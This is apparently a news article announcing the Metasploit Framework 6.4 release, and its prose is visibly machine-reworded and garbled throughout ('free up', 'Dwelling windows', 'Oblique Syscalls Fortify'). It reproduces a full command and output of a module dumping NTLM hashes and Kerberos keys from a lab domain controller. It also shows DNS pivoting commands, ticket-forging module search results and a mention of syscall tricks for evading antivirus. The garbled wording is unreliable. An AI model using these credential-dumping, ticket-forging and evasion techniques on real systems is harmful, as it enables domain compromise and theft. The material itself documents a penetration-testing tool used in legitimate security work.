Metasploit Framework 6.4 Released: What’s New!

Basically the most contemporary free up from Metasploit, Framework 6.4, is a testomony to this ongoing war. It brings a huge range of most contemporary functions and enhancements to the forefront of cybersecurity.

It has been somewhat over a twelve months since Metasploit launched version 6.3, and the team of workers at Rapid7 has no longer been indolent.

The sleek 6.4 version of the Metasploit Framework introduces essential enhancements and sleek capabilities, building on the stable foundation of its predecessor.

This free up underscores Metasploit’s dedication to offering reducing-edge tools for penetration testers and cybersecurity professionals.

Kerberos Improvements

One in every of the highlights of this free up is the wide improvements made to Kerberos authentication give a boost to.

Constructing on the initial give a boost to launched in version 6.3, Metasploit 6.4 provides sleek capabilities, including give a boost to for the diamond and sapphire ways alongside the recent golden and silver ways.

This update ensures compatibility with Dwelling windows Server 2022, keeping tempo with the most contemporary Dwelling windows targets.

Metasploit has no longer too lengthy ago launched the initiating of Metasploit Framework 6.4, fixed with a recent article by Rapid7.

Furthermore, Metasploit 6.4 introduces a sleek module that enables customers to dump Kerberos tickets from a compromised host, an identical to the functionality offered by the approved Rubeus tool.

This enhancement is efficacious for exploiting cases of Unconstrained Delegation, extra expanding the toolkit on hand to cybersecurity professionals.

Instance of working the gather/windows_secrets_dump module with Kerberos authentication and the DOMAIN run:

msf6 auxiliary(gather/windows_secrets_dump) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local action=DOMAIN  [*] Running module against 192.168.123.133  [+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGT-Response  [*] 192.168.123.133:445 - 192.168.123.133:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_724176.bin  [+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response  [*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_878194.bin  [+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response  [*] 192.168.123.133:445 - Opening Service Control Manager  …  [*] 192.168.123.133:445 - Using cached credential for krbtgt/[email protected] [email protected]  [+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response  [*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130522_default_192.168.123.133_mit.kerberos.cca_113846.bin  [+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response  [*] 192.168.123.133:445 - Bound to DRSR  [*] 192.168.123.133:445 - Decrypting hash for user: CN=Administrator,CN=Users,DC=demo,DC=local  [*] 192.168.123.133:445 - Decrypting hash for user: CN=Guest,CN=Users,DC=demo,DC=local  [*] 192.168.123.133:445 - Decrypting hash for user: CN=krbtgt,CN=Users,DC=demo,DC=local  [*] 192.168.123.133:445 - Decrypting hash for user: CN=vagrant,CN=Users,DC=demo,DC=local  [*] 192.168.123.133:445 - Decrypting hash for user: CN=DC01,OU=Domain Controllers,DC=demo,DC=local  [*] 192.168.123.133:445 - Decrypting hash for user: CN=DESKTOP-QUUL3FQV,CN=Computers,DC=demo,DC=local  # SID's:  Administrator: S-1-5-21-1242350107-3695253863-3717863007-500  …  # NTLM hashes:  Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:::  …  # Full pwdump format:  Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202309151519,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::  …  # Kerberos keys:  Administrator:aes256-cts-hmac-sha1-96:f68d8df38809b402cf49799faf991e77d3d931235d1cfa20fab35d348c0fa6a6  …  [*] 192.168.123.133:445 - Cleaning up...  [*] Auxiliary module execution completed

Raj Samani, a Chief Scientist at Rapid7, no longer too lengthy ago tweeted expressing gratitude in direction of the Metasploit team of workers and neighborhood for their distinctive work in successfully releasing version 6.4 of the Metasploit Framework.

DNS Configuration and Contemporary Session Forms

One other essential enchancment is the improved handling of DNS queries within the Metasploit framework.

This update permits customers to configure how hostnames would possibly perchance maybe perchance smooth be resolved, which is terribly significant in pivoting scenarios.

This ensures that DNS queries for internal resources set besides a compromised host as a substitute of the particular person’s draw, enhancing operational security.

Metasploit 6.4 additionally introduces sleek PostgreSQL, MSSQL, MySQL, and SMB session forms. These session forms allow for interactive queries with remote database cases and narrate interplay with SMB shares, including file upload and download capabilities.

This addition streamlines working multiple modules in opposition to a single session, making improvements to efficiency and effectiveness.

Examples of manipulating the DNS configuration:

dns add --rule *.lab.lan --session 1 --index 1 192.0.2.1  dns add --rule honeypot.lab.lan --index 2 black-hole  dns add-static example2.lab.lan 192.0.2.201  dns add --index 1 --rule * static system 192.0.2.1

Viewing the most contemporary configuration:

 msf6 > dns print  Default search domain: N/A  Default search list:    * tor.example.com    * localdomain  Current cache size:    0  Resolver rule entries  =====================     #  Rule              Resolver    Comm channel     -  ----              --------    ------------     1  *.lab.lan         192.0.2.1   Session 1     2  honeypot.lab.lan  black-hole  N/A     3  *     .    _              static      N/A     .    _              10.4.5.45     .    _              10.3.20.98  Static hostnames  ================     Hostname          IPv4 Address  IPv6 Address     --------          ------------  ------------     example.lab.lan   192.0.2.200     example2.lab.lan  192.0.2.201

Oblique Syscalls Fortify and Discoverability Improvements

Metasploit 6.4 supports indirect syscalls, a trend basically traditional by security tool to avoid EDR/AV detection and evade dynamic prognosis.

This update specializes in substituting Win32 API calls with indirect syscalls to their corresponding native APIs, enhancing the stealthiness of operations performed with Metasploit.

To support customers in navigating the big array of modules on hand within the framework, Metasploit 6.4 introduces improvements to module discoverability.

The sleek Hierarchical Search operate matches extra fields within modules, making it more uncomplicated for customers to search out the tools they want for their initiatives.

As an instance, this will likely trigger the auxiliary/admin/kerberos/forge_ticket module to insist up when the particular person searches for forge_golden it because it’s miles an run of the module:

msf6 auxiliary(scanner/mysql/mysql_hashdump) > search kerberos forge  Matching Modules  ================     #  Name                                                 Disclosure Date  Rank    Check  Description     -  ----                                                 ---------------  ----    -----  -----------     0  auxiliary/admin/kerberos/forge_ticket                .                normal  No     Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging     1    _ action: FORGE_DIAMOND                           .                .       .      Forge a Diamond Ticket     2    _ action: FORGE_GOLDEN                            .                .       .      Forge a Golden Ticket     3    _ action: FORGE_SAPPHIRE                          .                .       .      Forge a Sapphire Ticket     4    _ action: FORGE_SILVER                            .                .       .      Forge a Silver Ticket     5    _ AKA: Ticketer                                   .                .       .      .     6    _ AKA: Klist                                      .                .       .      .     7  auxiliary/admin/kerberos/ms14_068_kerberos_checksum  2014-11-18       normal  No     MS14-068 Microsoft Kerberos Checksum Validation Vulnerability  Interact with a module by name or index.   For example, info 7, use 7 or use auxiliary/admin/Kerberos/ms14_068_kerberos_checksum  msf6 auxiliary(scanner/mysql/mysql_hashdump) >

The free up of Metasploit Framework 6.4 marks yet another milestone in organising one of many most most frequently traditional penetration checking out tools.

With its sleek functions and enhancements, Metasploit continues to arm cybersecurity professionals with the tools they want to give protection to in opposition to the ever-evolving threats within the digital world.

As cyber threats grow in complexity, tools admire Metasploit Framework 6.4 are essential for affirming the safety of digital infrastructures worldwide.

Preserve up in the past on Cybersecurity data, Whitepapers, and Infographics. Prepare us on LinkedIn & Twitter.